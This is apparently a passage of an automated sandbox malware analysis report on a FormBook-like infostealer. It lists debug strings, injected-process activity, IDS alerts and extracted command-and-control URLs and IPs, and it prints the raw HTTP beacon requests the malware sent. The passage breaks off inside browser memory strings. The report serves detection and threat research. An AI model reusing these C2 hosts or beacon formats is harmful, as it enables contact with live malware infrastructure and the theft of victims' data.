          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8610000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.CSharp.pdb& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE861C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb4M source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mstsc.pdbGCTL source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: mstsc.pdb source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: firefox.pdb source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: #U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: firefox.pdbP source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: iexplore.pdbUGP source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: Binary string: gpC:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.CSharp.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbm source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb(s source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp, #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbexe source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb.Ac source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbion~HC source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Drawing.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb2, T source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbtime@H] source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: iexplore.pdb source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003626C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose,6_2_003626C7
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4x nop then pop esi1_2_004172D9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4x nop then pop esi1_2_00417287
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4x nop then pop edi1_2_0040E46A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4x nop then pop edi1_2_00416CC5
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49846 -> 66.29.149.193:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 38.174.75.236:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49853 -> 18.143.129.199:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49855 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 91.195.240.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49860 -> 217.160.0.14:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 66.29.149.193 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.venitro.com/gy14/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.mtdiyx.xyz
          Source: DNS query: www.169cc.xyz
          Source: DNS query: www.169cc.xyz
          Source: DNS query: www.qieqyt.xyz
          Source: DNS query: www.qieqyt.xyz
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=pMF/70cK97I4N1zsxTPsXpV8M2aXG2v92n0Y4HwmOzYT3hc8E6pR6GODiKmxyANgrdJ8&3f=_jAPZR HTTP/1.1Host: www.mtdiyx.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR HTTP/1.1Host: www.venitro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=nlOvXhjGD5/GGOZHcXLEDMhV39z3f5HCfGE2961zRYd5Ns2dNpc8yFLhWSyWMoAq8svn&3f=_jAPZR HTTP/1.1Host: www.aicashu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=6Pri5y0UMTrC/YK0G3cvyv6pjPPZbeJJYk0fOdV+Oxw8pn3IGe/8E0FD3PMHkDwd7eIO&3f=_jAPZR HTTP/1.1Host: www.qieqyt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
          Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
          Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAEF82 getaddrinfo,setsockopt,recv,5_2_0FAAEF82
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C
          Source: global trafficHTTP traffic detected: GET /crx/blobs/AcO95oi6D0F4oCCXbuWOg_kTjmxw8s8dsTSOoPLH-9cazKIP4GZm10_AmRQBwhL1FQ_pwuVBiXNpeijzCuT90r5cABsKnZNHzbhDfTTzc3NFcLwgPYQKIyakH_oQpHvh_HsAxlKa5aSglzp_Czui1gLpPktRBAGI7iwW/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_77_2_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1717396960&P2=404&P3=2&P4=ULNdjLkH43bttteLUmqiTRcCoRkq8geCYsmFuW120olMpAB1hZlGSD7a5N19YXoBdeESSnvSJycFdjgdcmlLdA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: zAvZ1Ve+Lk5FaTZ3hfzK3dSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: code.jquery.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /b?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /b2?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
          Source: global trafficHTTP traffic detected: GET /b?rn=1716792164814&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
          Source: global trafficHTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=Z66hqSRAIxK%2FfuiudWUa9VEzQbPIGUiDfcuGAIlqgPw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-07-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /ast/ast.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: acdn.adnxs.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=pMF/70cK97I4N1zsxTPsXpV8M2aXG2v92n0Y4HwmOzYT3hc8E6pR6GODiKmxyANgrdJ8&3f=_jAPZR HTTP/1.1Host: www.mtdiyx.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR HTTP/1.1Host: www.venitro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=nlOvXhjGD5/GGOZHcXLEDMhV39z3f5HCfGE2961zRYd5Ns2dNpc8yFLhWSyWMoAq8svn&3f=_jAPZR HTTP/1.1Host: www.aicashu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gy14/?4hIPNj=6Pri5y0UMTrC/YK0G3cvyv6pjPPZbeJJYk0fOdV+Oxw8pn3IGe/8E0FD3PMHkDwd7eIO&3f=_jAPZR HTTP/1.1Host: www.qieqyt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: not when you can cut the cord.","readTimeMin":9,"url":"https://www.tomsguide.com/entertainment/streaming/cord-cutting-guide","locale":"en-us","financeMetadata":{"stocks":[],"sentimentRatings":[{"topic":"wf_sentiment_positive","score":168},{"topic":"wf_sentiment_negative","score":15},{"topic":"wf_sentiment_neutral","score":9816}],"categories":[{"topic":"money","score":10000}]},"publishedDateTime":"2024-05-12T12:00:00Z","isFeatured":false,"images":[{"width":1920,"height":1080,"url":"https://th.bing.com/th?id=ORMS.8da151fbcc3eff4e8362bd2a63c7a3d0&pid=Wdp","title":"The YouTube TV, Sling TV, Hulu, Philo, DirecTV Stream and FuboTV logos appear on a screen with a scissors cutting a coaxial cable wire in front.","caption":"","source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#184794"},{"isDarkMode":false,"hexColor":"#E2EEFB"}]}],"provider":{"id":"AAUzalI","name":"Tom's Guide","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUzf9j.img","profileId":"vid-vddqr9408j0m8pski5v74akh9u9dsgw5h3xasauhrs37menku95a","lightThemeSVGLogo":{"width":68,"height":12,"url":"https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRyR"},"darkThemeSVGLogo":{"width":68,"height":12,"url":"https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRyR-dark"}},"category":"money","reactionSummary":{"totalCount":242,"subReactionSummaries":[{"totalCount":184,"type":"upvote"},{"totalCount":58,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":15,"subCommentSummaries":[{"totalCount":9,"type":"comment"},{"totalCount":6,"type":"reply"}]},"commentStatus":"on","relevanceScore":888.0023,"subscriptionProductType":"undefined","feed":{"id":"Y_9eb0ac10-32bc-43cf-816e-5beaaf524f7a","feedName":"News"},"topics":[{"label":"News","weight":0.6985242366790771,"feedId":"Y_9eb0ac10-32bc-43cf-816e-5beaaf524f7a","locale":"en-us"}],"isWorkNewsContent":false,"ri":"313","recoId":"l9UAE1iUwonWkiPcKb6-CFBPgm","source":"msn"},{"id":"AA1nCym8","type":"video","title":"Top 10 LGBTQIA+ Shows That Were Canceled Too Soon","abstract":"These LGBTQIA+ shows were canceled too soon. Welcome to MsMojo, and tod equals www.youtube.com (Youtube)
          Source: me[1].json.29.drString found in binary or memory: not when you can cut the cord.","readTimeMin":9,"url":"https://www.tomsguide.com/entertainment/streaming/cord-cutting-guide","locale":"en-us","financeMetadata":{"stocks":[],"sentimentRatings":[{"topic":"wf_sentiment_positive","score":168},{"topic":"wf_sentiment_negative","score":15},{"topic":"wf_sentiment_neutral","score":9816}],"categories":[{"topic":"money","score":10000}]},"publishedDateTime":"2024-05-12T12:00:00Z","isFeatured":false,"images":[{"width":1920,"height":1080,"url":"https://th.bing.com/th?id=ORMS.8da151fbcc3eff4e8362bd2a63c7a3d0&pid=Wdp","title":"The YouTube TV, Sling TV, Hulu, Philo, DirecTV Stream and FuboTV logos appear on a screen with a scissors cutting a coaxial cable wire in front.","caption":"","source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#184794"},{"isDarkMode":false,"hexColor":"#E2EEFB"}]}],"provider":{"id":"AAUzalI","name":"Tom's 